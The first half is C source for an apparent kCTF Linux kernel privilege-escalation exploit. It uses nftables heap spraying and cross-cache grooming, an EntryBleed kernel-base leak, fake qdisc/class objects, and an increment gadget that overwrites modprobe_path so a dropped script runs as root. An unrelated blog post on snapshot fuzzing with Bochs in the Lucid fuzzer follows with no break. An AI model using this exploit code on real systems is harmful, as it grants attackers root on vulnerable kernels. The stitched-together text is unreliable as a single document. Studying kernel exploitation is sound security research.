#define MNL_BUF_SIZE 4096UL

// Global for user data, set once
char g_userdata[USERDATA_SIZE];

// Creates a single nftables table to spray userdata
void create_table(const char *table_name) {
    if (!table_name) {
        fprintf(stderr, "Error: Table name is NULL\n");
        return;
    }

    struct mnl_socket *mnl_sock;
    struct mnl_nlmsg_batch *batch;
    char buf[MNL_BUF_SIZE];

    // Open Netlink socket
    mnl_sock = mnl_socket_open(NETLINK_NETFILTER);
    if (!mnl_sock) {
        perror("mnl_socket_open");
        exit(EXIT_FAILURE);
    }

    // Connect to Netlink
    if (mnl_socket_bind(mnl_sock, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("mnl_socket_bind");
        mnl_socket_close(mnl_sock);
        exit(EXIT_FAILURE);
    }

    // Initialize Netlink batch (one message per batch)
    memset(buf, 0, sizeof(buf));
    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

    int seq = 0;
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    struct nftnl_table *table = nftnl_table_alloc();
    if (!table) {
        perror("nftnl_table_alloc");
        mnl_socket_close(mnl_sock);
        return;
    }

    // Set table attributes
    nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, NFPROTO_INET);
    nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);

    // Set 128-byte userdata
    nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, g_userdata, USERDATA_SIZE);

    // Build Netlink message
    struct nlmsghdr *msg_hdr = nftnl_table_nlmsg_build_hdr(
        mnl_nlmsg_batch_current(batch),
        NFT_MSG_NEWTABLE,
        NFPROTO_INET,
        NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK,
        seq++
    );

    // Attach table payload
    nftnl_table_nlmsg_build_payload(msg_hdr, table);
    nftnl_table_free(table);
    mnl_nlmsg_batch_next(batch);

    // End batch (one message only)
    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // Send the batch (one message per batch)
    if (mnl_socket_sendto(mnl_sock, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0) {
        perror("mnl_socket_sendto");
        mnl_socket_close(mnl_sock);
        return;
    }

    ssize_t recv_len = mnl_socket_recvfrom(mnl_sock, buf, sizeof(buf));
    if (recv_len < 0) {
        perror("mnl_socket_recvfrom");
    } else {
        struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
        if (nlh->nlmsg_type == NLMSG_ERROR) {
            struct nlmsgerr *err = (struct nlmsgerr *)mnl_nlmsg_get_payload(nlh);
            if (err->error) {
                fprintf(stderr, "Netlink error: %s\n", strerror(-err->error));
            }
        }
    }

    // Cleanup
    mnl_nlmsg_batch_stop(batch);
    mnl_socket_close(mnl_sock);
}

// Deletes a single nftables table
void delete_table(const char *table_name) {
    if (!table_name) {
        fprintf(stderr, "Error: Table name is NULL\n");
        return;
    }

    struct mnl_socket *mnl_sock;
    struct mnl_nlmsg_batch *batch;
    char buf[MNL_BUF_SIZE];

    // Open Netlink socket
    mnl_sock = mnl_socket_open(NETLINK_NETFILTER);
    if (!mnl_sock) {
        perror("mnl_socket_open");
        exit(EXIT_FAILURE);
    }

    // Connect to Netlink
    if (mnl_socket_bind(mnl_sock, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("mnl_socket_bind");
        mnl_socket_close(mnl_sock);
        exit(EXIT_FAILURE);
    }

    // Initialize Netlink batch
    memset(buf, 0, sizeof(buf));
    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

    int seq = 0;
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    struct nftnl_table *table = nftnl_table_alloc();
    if (!table) {
        perror("nftnl_table_alloc");
        mnl_socket_close(mnl_sock);
        return;
    }

    // Set table attributes
    nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, NFPROTO_INET);
    nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);

    // Build Netlink message for table deletion
    struct nlmsghdr *msg_hdr = nftnl_table_nlmsg_build_hdr(
        mnl_nlmsg_batch_current(batch),
        NFT_MSG_DELTABLE,
        NFPROTO_INET,
        NLM_F_ACK,
        seq++
    );

    // Attach table payload
    nftnl_table_nlmsg_build_payload(msg_hdr, table);
    nftnl_table_free(table);
    mnl_nlmsg_batch_next(batch);

    // End batch
    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // Send the batch
    if (mnl_socket_sendto(mnl_sock, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0) {
        perror("mnl_socket_sendto");
        mnl_socket_close(mnl_sock);
        return;
    }

    ssize_t recv_len = mnl_socket_recvfrom(mnl_sock, buf, sizeof(buf));
    if (recv_len < 0) {
        perror("mnl_socket_recvfrom");
    } else {
        struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
        if (nlh->nlmsg_type == NLMSG_ERROR) {
            struct nlmsgerr *err = (struct nlmsgerr *)mnl_nlmsg_get_payload(nlh);
            if (err->error) {
                fprintf(stderr, "Netlink error: %s\n", strerror(-err->error));
                printf("Table name was: %s\n", table_name);
            }
        }
    }

    // Cleanup
    mnl_nlmsg_batch_stop(batch);
    mnl_socket_close(mnl_sock);
}

void spray_tables(void) {
    for (int i = 0; i < NUM_SPRAY_OBJS; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%d", i);
        create_table(table_name);
    }
}

// Try to use entry bleed to leak the kernel base
#define KERNEL_LOWER_BOUND 0xffffffff80000000ULL
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ULL

uint64_t sidechannel(uint64_t addr) {
  uint64_t a, b, c, d;
  asm volatile (".intel_syntax noprefix;"
    "mfence;"
    "rdtscp;"
    "mov %0, rax;"
    "mov %1, rdx;"
    "xor rax, rax;"
    "lfence;"
    "prefetchnta qword ptr [%4];"
    "prefetcht2 qword ptr [%4];"
    "xor rax, rax;"
    "lfence;"
    "rdtscp;"
    "mov %2, rax;"
    "mov %3, rdx;"
    "mfence;"
    ".att_syntax;"
    : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
    : "r" (addr)
    : "rax", "rbx", "rcx", "rdx");
  a = (b << 32) | a;
  c = (d << 32) | c;
  return c - a;
}

#define STEP 0x100000ull
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100
#define ARR_SIZE (KERNEL_UPPER_BOUND - KERNEL_LOWER_BOUND) / STEP

uint64_t leak_syscall_entry(uint64_t scan_start, uint64_t scan_end) 
{
    uint64_t data[ARR_SIZE] = {0};
    uint64_t min = ~0, addr = ~0;

    for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
    {
        for (uint64_t idx = 0; idx < ARR_SIZE; idx++) 
        {
            uint64_t test = scan_start + idx * STEP;
            syscall(104);
            uint64_t time = sidechannel(test);
            if (i >= DUMMY_ITERATIONS)
                data[idx] += time;
        }
    }

    for (int i = 0; i < ARR_SIZE; i++)
    {
        data[i] /= ITERATIONS;
        if (data[i] < min)
        {
            min = data[i];
            addr = scan_start + i * STEP;
        }
    }

    return addr;
}

// Setup our class/qdisc hierarchy
void setup_classes(void) {
    // Create root qdisc
    printf("[>] Creating root qdisc...\n");
    system("./tc.bin qdisc add dev lo root handle 1:0 drr");

    // Create class 1:1
    printf("[>] Creating class 1:1...\n");
    system("./tc.bin class add dev lo classid 1:1 drr");

    // Create class 1:2
    printf("[>] Creating class 1:3...\n");
    system("./tc.bin class add dev lo classid 1:3 drr");

    // Assign plug qdisc to class 1:1
    printf("[>] Assigning plug qdisc to class 1:1...\n");
    system("./tc.bin qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024");

    // Assign pfifo qdisc to class 1:3
    printf("[>] Assigning pfifo qdisc to class 1:3...\n");
    system("./tc.bin qdisc add dev lo parent 1:3 handle 3:0 pfifo");
}

// Cross cache defines
#define OBJS_PER_SLAB 32UL  // Number of objects in a kmalloc-128 page
#define CPU_PARTIAL 30UL    // Number of partial pages for kmalloc-128
#define OVERFLOW_FACTOR 4UL // We want to overkill this 

// Cross cache globals
typedef struct cc_bucket {
    uint64_t min;
    uint64_t max;
} cc_bucket_t;

cc_bucket_t cc1_bucket = { 0 };
cc_bucket_t cc2_bucket = { 0 };
cc_bucket_t cc3_bucket = { 0 };

// Cross-cache stage 1: Spray enough objects that we start getting brand new
// slab allocations in kmalloc-128 and also reserve enough pages that when
// they are placed on the partials list they will evict empty pages 
void cc_1(void) {
    // Calculate the number of objects to spray
    uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;

    // Spray the tables
    for (int i = 0; i < spray_amt; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%d", i);
        create_table(table_name);
    }

    // Update the bucket
    cc1_bucket.min = 0;
    cc1_bucket.max = spray_amt - 1;
}

// Cross-cache stage 2: Allocate enough objects that we probably land somewhere
// in the middle of a new slab (page) so that our object is probably not the 
// exact first or last object on the page
void cc_2(void) {
    // Calculate the number of objects to spray
    uint64_t spray_amt = OBJS_PER_SLAB - 1;

    // Take into account cc1 when spraying
    uint64_t offset = cc1_bucket.max + 1;
    for (int i = 0; i < spray_amt; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%ld", i + offset);
        create_table(table_name);
    }

    // Update the bucket
    cc2_bucket.min = offset;
    cc2_bucket.max = offset + spray_amt;
}

// Cross-cache stage 3: Allocate enough objects to complete the victim slab and 
// probably go over onto a new brand new slab
void cc_3(void) {
    // Calculate the number of objects to spray
    uint64_t spray_amt = OBJS_PER_SLAB + 2; // Extra one here for class 1:1?

    // Take into account cc2 when spraying
    uint64_t offset = cc2_bucket.max;
    for (int i = 0; i < spray_amt; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%ld", i + offset);
        create_table(table_name);
    }

    // Update the bucket
    cc3_bucket.min = offset;
    cc3_bucket.max = offset + spray_amt; 
}

// Free all of the objects we allocated in steps 2 and 3. This will place these
// pages on the kmalloc-128 partials list
void cc_4(void) {
    // Calculate the id to start with and the amt to free
    uint64_t start = cc2_bucket.min;
    uint64_t free_amt = cc3_bucket.max - start;

    for (int i = 0; i < free_amt; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%ld", i + start);
        delete_table(table_name);
    }
}

// Free an object on each of the pages that we allocated in step 1. This will
// place all of these pages onto the partials list and evict our empty page
void cc_5(void) {
    // Pick the first object to free
    uint64_t start = cc1_bucket.min;

    // Establish the max free object
    uint64_t max = cc1_bucket.max;

    // Free one object per page 
    for (int i = start; i < max; i += OBJS_PER_SLAB) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%d", i);
        delete_table(table_name);
    }
}

char *required_files[] = {
    "tc.bin",
    "ip.bin",
    "socat.bin",
    "iptables.bin"
};

size_t num_files = 3;

int get_kernel_version(void) {
    struct utsname buffer;
    
    if (uname(&buffer) != 0) {
        perror("uname");
        exit(-1);
    }

    int major_version = 0;
    sscanf(buffer.release, "%d", &major_version);

    return major_version;
}

// Fake class data
uint8_t g_class[128] = { 0 };

// Setup the fake class contents in the pipes
void setup_fake_class(void) {
    // Set each one up with cyclical pattern for debugging
    uint64_t *ptr = (uint64_t *)&g_class[0];
    uint64_t val = 0x4141414141414141;
    for (int i = 0; i < 128 / 8; i++) {
        ptr[i] = val;
        val += 0x0101010101010101;
    }

    // Fake &cl->qdisc, set it to the address of the kernfs buffer + 8 to avoid
    // a NULL later when we use the address of &qdisc->gso_skb
    ptr[12] = g_kernfs_addr + 8;

    // Fake the &cl->deficit value, set it such that it is always greater than
    // the "len" returned from qdisc_pkt_len inside of drr_dequeue
    ptr[13] = 0xFFFFFFFFFFFFFFFF;

    // Fake class data is setup, we can fit 32 on a page. So each pipe gets
    // 32 fake classes in its backing page. Reset all the pipe buffer contents
    // to be the fake class
    char drain[4096] = { 0 };
    for (int i = 0; i < PIPE_MAX; i++) {
        // Drain the current pipe
        read(g_pipes_arr[i][PIPE_READ], drain, 4096);

        // Write the class contents to the pipe 32 times
        for (int j = 0; j < 32; j++) {
            ssize_t bytes_written = 0;
            while (bytes_written < 128) {
                ssize_t ret = 
                    write(
                        g_pipes_arr[i][PIPE_WRITE],
                        g_class + bytes_written,
                        128 - bytes_written);
                if (ret <= 0) {
                    perror("write failed");
                    exit(EXIT_FAILURE);
                }
                bytes_written += ret;
            }
        }
    }
}


// Fake qdisc data
uint8_t g_qdisc[4096] = { 0 };

// Send controlled data to deducible address in kernel from kernel base
void fill_kernfs_buf(void) {
    // Create a lockfile that we can actually use
    setenv("XTABLES_LOCKFILE", "/tmp/xtables.lock", 1);

    // Redirect stdout and stderr to /dev/null
    int devnull = open("/dev/null", O_WRONLY);
    if (devnull < 0) {
        exit(-1);
    }
    dup2(devnull, STDOUT_FILENO);
    dup2(devnull, STDERR_FILENO);
    close(devnull);

    // Execute iptables to fill buffer
    execl("./iptables.bin", "iptables", "-A", "OUTPUT", "-m", "cgroup", "--path",
        g_qdisc, "-j", "LOG", (char *)NULL);
}

// Check for NULL byte in u64
int has_null(uint64_t val) {
    for (int i = 0; i < 8; i++) {
        if (((val >> (i * 8)) & 0xFF) == 0) {
            return 1;
        }
    }
    return 0;
}

void setup_fake_qdisc(size_t num_complete) {
    // Set each one up with cyclical pattern for debugging
    uint64_t *ptr = (uint64_t *)&g_qdisc[0];
    uint64_t val = 0x0101010101010101;
    for (int i = 0; i < 4906 / 8; i++) {
        ptr[i] = val;
        val += 0x0101010101010101;
    }

    // Fake &qdisc->ops, set it kind of far into the kernfs_buf to avoid conflict
    ptr[4] = g_kernfs_addr + 32;

    // Fake &qdisc->ops->peek
    ptr[11] = g_write_gadget_addr;

    // The write address for the write gadget
    ptr[6] = g_write_target + num_complete;

    // Inside qdisc_dequeue_peeked, we do skb_peek(&sch->gso_skb) and that
    // address has to point to itself, so make &sch->gso_skb equal itself
    ptr[17] = g_kernfs_addr + 0x88;

    // Place pointer to our return NULL gadget so that qdisc_dequeue_peeked
    // returns NULL
    ptr[2] = g_null_gadget_addr;

    // NULL gadget does `return dst->dev->mut` and dev happens to be the first
    // field, so set ours to a pointer that points to NULL (NULL happens later
    // in the kernfs_buf)
    ptr[1] = g_kernfs_addr + 512;

    // These addresses cannot have a NULL in them or else our kernfs_buf gets
    // NULL terminated and we're out of luck
    if (
        has_null(g_kernfs_addr + 120) || 
        has_null(g_write_gadget_addr) ||
        has_null(g_write_target)      ||
        has_null(g_kernfs_addr + 0x88)
        ) {
        printf("NULL ptr in these values: 0x%lx, 0x%lx\n",
            g_kernfs_addr + 120, g_write_gadget_addr);
        exit(-1);
    }
}

// Send kernfs data to the kernel
void send_kernfs_data(void) {
    int pid = fork();
    if (pid < 0) {
        perror("fork");
        exit(-1);
    }

    // Child
    if (pid == 0) {
        fill_kernfs_buf(); // Doesn't return
    }

    // Parent, wait for child to finish
    int status;
    waitpid(pid, &status, 0);
}

// Trigger the bug
void trigger_bug(void) {
    system("echo \"\" | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))");
}

// Trigger bug and increment kernel value for /sbin/modeprobe overwrite
void increment_kernel_val(size_t num_complete) {
    // Reset the fake class data, because deficit changes each iteration
    setup_fake_class();

    // Reset the fake qdisc data, we NULL out the field in the increment gadget
    setup_fake_qdisc(num_complete);

    // Send the data to the kernel
    send_kernfs_data();

    // Trigger the bug
    trigger_bug();
}

// Overwrite modprobe path
void overwrite_modprobe(void) {
    // We have an increment gadget as our write primitive. This means we'll 
    // target each byte of /sbin/modprobe at a time and increment that byte
    // until it's the right value. We start here: /'s'bin/modprobe. The way
    // that I decided to do this was to simply encode the logic in this function
    // by simulating each write as we do it in the kernel and then we can
    // check in the program if we're done or not. So let's setup our simulated
    // values:
    // 
    // What we're starting with
    const char sim_start[] = "/sbin/modprobe";

    // What our goal is
    const char sim_goal[] = "/proc/500/fd/3";

    // Buffer to simulate writes
    uint8_t sim_modprobe[128] = { 0 };
    memcpy(sim_modprobe, sim_start, sizeof(sim_start));

    // What we're targeting right now. We start at offset 1 because '/' already
    // works for us
    char *sim_write_target = (char *)&sim_modprobe[1];

    // Iterate until the memory is identical
    size_t num_complete = 0;
    int64_t *write_ptr = (int64_t *)sim_write_target;
    while (memcmp(sim_goal, sim_modprobe, sizeof(sim_goal))) {
        // Iterate until the character matches
        while (memcmp(sim_write_target, sim_goal + num_complete + 1, 1)) {
            // Increment the val and set it
            int64_t curr_val = *write_ptr;
            curr_val++;
            *write_ptr = curr_val;

            // Increment the value in the kernel
            increment_kernel_val(num_complete);
        }

        // This character matches, move to the next character
        sim_write_target++;
        write_ptr = (int64_t *)sim_write_target;
        num_complete++;
    }
}

#define BUFFER_SIZE 1024

// What children do
void child_func() {
    // Open the privesc script
    int fd = open("privesc.sh", O_RDONLY);
    if (fd != 3) {
        printf("Got the wrong fd for privesc.sh\n");
        exit(-1);
    }

    char buffer[BUFFER_SIZE];
    ssize_t bytes_read;

    // Block until there's data to read from stdin
    while ((bytes_read = read(STDIN_FILENO, buffer, sizeof(buffer))) > 0) {
        write(STDOUT_FILENO, buffer, bytes_read);
    }

    // Handle possible read errors
    if (bytes_read < 0) {
        perror("read");
        exit(EXIT_FAILURE);
    }

    // Exit
    exit(0);
}

// How many child processes we spawn
#define NUM_CHILDS 500UL

// Spray children processes so we have a predictable pid in the container
void spray_children(void) {
    for (int i = 0; i < NUM_CHILDS; i++) {
        int pid = fork();
        if (pid < 0) {
            perror("fork");
            exit(-1);
        }

        // Child
        if (pid == 0) {
            child_func();
        }
    }
}

int main(void) {
    // Drop scripts to disk
    printf("[>] Dropping scripts...\n");
    system("printf '\xff\xff\xff\xff' > trigger.sh");
    system("echo '#!/bin/bash' > privesc.sh");
    system("echo 'cat /flag > /proc/500/fd/0' >> privesc.sh");
    system("chmod +x trigger.sh privesc.sh");

    // Spray children processes
    printf("[>] Spraying child pids...\n");
    spray_children();

    // Check kernel version
    int major = get_kernel_version();
    if (major != 5 && major != 6) {
        printf("Wrong kernel version\n");
        exit(-1);
    }

    // Set offsets for kernel 5
    if (major == 5) {
        g_kernfs_addr = kernfs_addr_off_5;
        g_entry_syscall_off = entry_syscall_off_5;
        g_write_gadget_addr = write_gadget_off_5;
        g_modprobe_addr = modprobe_off_5;
        g_null_gadget_addr = null_gadget_off_5;
    }

    // Set offsets for kernel 6
    else {
        g_kernfs_addr = kernfs_addr_off_6;
        g_entry_syscall_off = entry_syscall_off_6;
        g_write_gadget_addr = write_gadget_off_6;
        g_modprobe_addr = modprobe_off_6;
        g_null_gadget_addr = null_gadget_off_6;
    }

    // Make sure we have the files we need, this is just for my lab not kCTF
    system("cp /usr/sbin/tc.bin /tmp/tc.bin >/dev/null 2>&1");
    system("cp /usr/sbin/ip.bin /tmp/ip.bin >/dev/null 2>&1");
    system("cp /usr/sbin/socat.bin /tmp/socat.bin >/dev/null 2>&1");
    system("cp /usr/sbin/iptables.bin /tmp/iptables.bin >/dev/null 2>&1");

    for (size_t i = 0; i < num_files; i++) {
        if (access(required_files[i], F_OK) != 0) {
            printf("%s did not exist, exiting...\n", required_files[i]);
            exit(-1);
        }
    }

    // Determine scan start and scan end
    uint64_t scan_start = KERNEL_LOWER_BOUND + g_entry_syscall_off;
    uint64_t scan_end = KERNEL_UPPER_BOUND + g_entry_syscall_off;

    // Attempt to entry bleed the kernel base
    g_kernel_base = leak_syscall_entry(scan_start, scan_end) - g_entry_syscall_off;
    printf("[>] Kernel base address: 0x%lx\n", g_kernel_base);

    // Update kernfs addr
    g_kernfs_addr += g_kernel_base;
    printf("[>] Kernfs buffer address: 0x%lx\n", g_kernfs_addr);

    // Update arb write gadget
    g_write_gadget_addr += g_kernel_base;
    printf("[>] Arbitrary write gadget address: 0x%lx\n", g_write_gadget_addr);

    // Update modprobe
    g_modprobe_addr += g_kernel_base;
    printf("[>] Modprobe path address: 0x%lx\n", g_modprobe_addr);

    // Initialize the write target, we have to add 1 because /sbin/modprobe
    // already contains a '/' leading character that we'll retain
    g_write_target = (g_modprobe_addr - WRITE_TARGET_OFFSET) + 1;

    // Update NULL gadget
    g_null_gadget_addr += g_kernel_base;
    printf("[>] Return NULL gadget address: 0x%lx\n", g_null_gadget_addr);

    // Get CAPs
    printf("[>] Doing the unshare...\n");
    unshare_stuff();

    // Pin our process
    printf("[>] Pinning our process to core-0...\n");
    pin_to_core_0();

    // Setup listener
    printf("[>] Starting UDP listener...\n");
    start_udp_listener();

    // Allocate pipes
    printf("[>] Creating pipes...\n");
    allocate_pipes();

    // Allocate classes 1:1 and 1:3 and give them qdiscs
    printf("[>] Setting up initial classes...\n");
    setup_classes();

    // Execute cross-cache stage 1
    printf("[>] Executing cross-cache stage-1...\n");
    cc_1();

    // Execute cross-cache stage 2
    printf("[>] Executing cross-cache stage-2...\n");
    cc_2();

    // Allocate the victim class
    printf("[>] Allocating victim class 1:2...\n");
    system("./tc.bin class add dev lo classid 1:2 drr");

    // Execute the bug to re-parent 1:3's qdisc to 1:2
    printf("[>] Executing bug to reparent qdisc to 1:2 from 1:3...\n");
    system("./tc.bin qdisc replace dev lo parent 1:2 handle 3:0");

    // Display the setup
    printf("[>] Displaying hierarchy setup...\n");
    system("./tc.bin class ls dev lo");
    system("./tc.bin qdisc ls");

    // Enqueue packets in 1:1 and 1:2 qdiscs
    printf("[>] Enqueueing packets in 1:1 and 1:2...\n");
    system("echo \"\" | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))");
    system("echo \"\" | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))");

    // Delete classes 1:1 and 1:2 
    printf("[>] Deleting classes 1:1 and 1:2 and then cross-cache stage-3...\n");
    system("./tc.bin class delete dev lo classid 1:1");
    system("./tc.bin class delete dev lo classid 1:2");
    cc_3();

    // Execute cross-cache stage 4
    printf("[>] Executing cross-cache stage-4...\n");
    cc_4();

    // Execute cross-cache stage 5 and reclaim page with pipe writes
    printf("[>] Executing cross-cache stage-5 and reclaiming page...\n");
    cc_5();
    reclaim_page();

    // Overwrite modprobe path
    printf("[>] Overwriting modprobe path...\n");
    overwrite_modprobe();
    printf("[>] Modprobe path is *probably* overwritten lol!\n");

    // Execute trigger
    system("./trigger.sh");
    exit(-1);
}

Fuzzer Development 4: Snapshots, Code-Coverage, and Fuzzing

2024-06-23T00:00:00+00:00

Background

This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the Lucid repository

Introduction

Previously, we left off with implementing enough of the Linux emulation logic to get Lucid running a -static-pie Bochs up to its start menu. Well, we’ve accomplished a lot in the intervening few months since then. We’ve now implemented snapshots, code-coverage feedback, and more Linux emulation logic to the point now that we can actually fuzz things! So in this post, we’ll review some of the major features that have been added to the codebase as well as some examples on how to set the fuzzer up for fuzzing.

Snapshots

One of the key benefits to the design of this fuzzer (thank you Brandon Falk) is that the entire state of the emulated/target system is completely encapsulated by Bochs. The appeal here is that if we can reliably record and reset Bochs’ state, we get target snapshots by default. In the future, this will benefit us when our targets affect device states, something like fuzzing a network service. So now our problem becomes, how do we, on Linux, perfectly record and reset the state of a process?

Well, the solution I came up with I think is very aesthetically pleasing. We need to reset the following state in Bochs:

Any writable PT_LOAD memory segments in the Bochs image itself
Bochs’ file-table
Bochs’ dynamic memory, such as heap allocations
Bochs’ extended CPU state: AVX registers, floating point unit, etc
Bochs’ registers

Right off the bat, dynamic memory should be pretty trivial to record since we handle all calls to mmap ourselves in our fuzzer in the syscall emulation code. So we can pretty easily snapshot MMU state that way. This also applies to the file-table, since we also control all file I/O the same way. For now though, I haven’t implemented file-table snapshotting because for my fuzzing harness I’m using for development, Bochs doesn’t touch any files. I’ve resorted to marking files as dirty if we are fuzzing and they are touched and just panicking at that point for now. Later, we should be able to approach file snapshotting the same way we do the MMU.

Extended CPU state can be saved with machine instructions

But an outstanding question for me was figuring out how to record and reset the PT_LOAD segments. We can’t really track the dirtying of these pages well on Linux userland because they’ll be happening natively. There’s some common approaches to this type of problem in the fuzzing space though if you want to restore these pages differentially:

Mark those pages as non-writable and handle write-access faults for each page. This approach will let you know if Bochs ever uses the writable page. Once you handle a fault, you can permanently mark the page as writable and then lazily reset it each fuzzing iteration.
Use some of the utilities exposed for things like the Checkpoint Restore effort in /proc as discussed by d0c s4vage.

Ultimately though, I decided that for simplicity sake, I’d just reset all the writable segments each time.

The real problem however, is that Bochs dynamic memory allocations can be humungous because it will allocate heap memory to hold the emulated guest memory (your target system). So if you configure a guest VM with 2GB of RAM, Bochs will attempt to make a heap allocation of 2GB. This makes capturing and restoring the snapshot very expensive as a 2GB memcpy each fuzzing iteration would be very costly. So I needed a way to avoid this. Bochs does have memory access hooks however, so I could track dirtied memory in the guest this way. This might be a future implementation if we find that our current implementation becomes a performance bottleneck.

In line with my project philosophy for Lucid at the moment, which is that we’re ok sacrificing performance for either introspection or architecturual/implementation simplicity. I decided that there was a nice solution we could leverage given that we are the ones mapping Bochs into memory and not the kernel. As long as the ELF image loadable segments are ordered such that the writable segments are loaded last, this means that we start a block of memory that needs resetting. At this point you can think of the mapping like this in memory:

|-------------------------------------------------------|
|            Non-Writable ELF Segments                  |
|-------------------------------------------------------|   <-- Start of memory that we need to record and restore
|              Writable ELF Segments                    |
|-------------------------------------------------------|

This is nice for us because what we actually have now is the start of a contiguous block of writable memory that we need to restore each fuzzing iteration. The rest of the mutable memory that Bochs will affect that we care about for snapshots can be arbitrarily mapped, let’s think about it:

Extended state save area for Bochs: Yep, we control where this is mapped, we can map this right up against the last writable ELF segment with mmap and MAP_FIXED. Now our continguous block contains the extended state as well.
MMU Dynamic Memory (Brk, Mmap): Yep, we control this because we pre-allocate dynamic memory and then use these syscalls as basically bump allocator APIs so this is also now part of our contiguous block.

So now, we can conceptualize the entire block of memory that we need to track for snapshots as:

|-------------------------------------------------------|
|            Non-Writable ELF Segments                  |
|-------------------------------------------------------|   <-- Start of memory that we need to record and restore
|              Writable ELF Segments                    |
|-------------------------------------------------------|
|             Bochs Extended CPU State                  |
|-------------------------------------------------------|
|                Bochs MMU/Brk Pool                     |
|-------------------------------------------------------|   <-- End of memory that we need to record and restore

So why do we care about the writable memory being compact and contiguous like this? We still face the issue where the MMU/Brk pool of memory is way too large to do a giant memcpy each fuzzing iteration. Our solution must either use differential resets (ie, only reset what was dirty) or it must find a new way to do wholesale restoration since memcpy is not good enough.

Without wanting to noodle over differential resets and trying to focus on simplicity, I settled on an efficient way to use the concept of contiguous memory to our advantage for resetting the entire block without relying on memcpy. We can cache the snapshot contents in memory for the duration of the fuzzer by using Linux’s shared memory objects which are allocated with libc::shm_open. This is basically like opening a file that is backed by shared memory, so we won’t really trigger any disk reads or expensive file I/O when we read the contents for each snapshot restoration.

Next, when it’s time to restore, we can simply mmap that “file” overtop of the dirty continguous block. They will have the same size, right? And we control the location of the contiguous memory block, so this makes resetting dirty memory extremely easy! It’s literally mostly just this code:

// This function will take the saved data in the shm object and just mmap it
// overtop of the writable memory block to restore the memory contents
#[inline]
fn restore_memory_block(base: usize, length: usize, fd: i32) ->
    Result<(), LucidErr> {
    // mmap the saved memory contents overtop of the dirty contents
    let result = unsafe {
        libc::mmap(
            base as *mut libc::c_void,
            length,
            libc::PROT_READ | libc::PROT_WRITE,
            libc::MAP_PRIVATE | libc::MAP_FIXED,
            fd,
            0
        )
    };

    if result == libc::MAP_FAILED || result != base as *mut libc::c_void { 
        return Err(LucidErr::from("Failed to mmap restore snapshot"));
    }

    Ok(())
}

You just need the file descriptor for the shared memory object and you can perform the restoration for the memory contents. On my relatively old CPU and inside a VMWare VM, I was able to reset this memory block roughly 18k times per second which is definitely fast enough for a fuzzer like Lucid that will most certainly bottleneck on target emulation code. That’s not to say that we won’t have issues in the future however. A lot of kernel time with this approach is spent destroying the pages we mmap overtop of if they are no longer needed and this may be a bottleneck if we scale our fuzzing up in the future. Time will tell. For now, I love how simple and easy the approach is. Shoutout to Dominik Maier and the rest of the fuzzing discord for helping me workshop the idea.

Second most important benefit behind the simplicity, is that the performance is relatively constant regardless of block-size. We get to take advantage of several efficient memory management optimizations of the Linux kernel and we don’t have an issue with 2GB memcpy operations slowing us down. With my current setup of having 64MB of guest memory allocated, this shmem + mmap approach was roughly 10x faster than a giant memcpy. We go from spending 13% of CPU time in the snapshot restoration code to 96% of the time with memcpy. So it works well for us right now.

Some other small things about snapshot restoration, we can “clone” an existing MMU, ie the one we saved during snapshot recording, to the current MMU (dirty) with something like this very trivially:

// Copy the contents of an existing MMU, used for snapshot restore
    pub fn restore(&mut self, mmu: &Mmu) {
        self.map_base = mmu.map_base;
        self.map_length = mmu.map_length;
        self.brk_base = mmu.brk_base;
        self.brk_size = mmu.brk_size;
        self.curr_brk = mmu.curr_brk;
        self.mmap_base = mmu.mmap_base;
        self.mmap_size = mmu.mmap_size;
        self.curr_mmap = mmu.curr_mmap;
        self.next_mmap = mmu.next_mmap;
    }

We also have the GPRs of Bochs to worry about, but luckily for us, those are saved already when Bochs context switches into the Lucid in order to take the snapshot.

Triggering Snapshot Operations

The next thing we need to do is determine how to invoke snapshot logic from the harness running in the guest. I decided to piggyback off of Bochs’ approach and leverage specific types of NOP instruction sequences that are unlikely to exist in your target (collisions are not likely). Bochs uses these types of NOPs as magic breakpoints for when you’re using Bochs compiled in debugger mode. They are as follows:

87C9  | xchg cx,cx  | 1000011111 001 001 -> 1
87D2  | xchg dx,dx  | 1000011111 010 010 -> 2
87DB  | xchg bx,bx  | 1000011111 011 011 -> 3
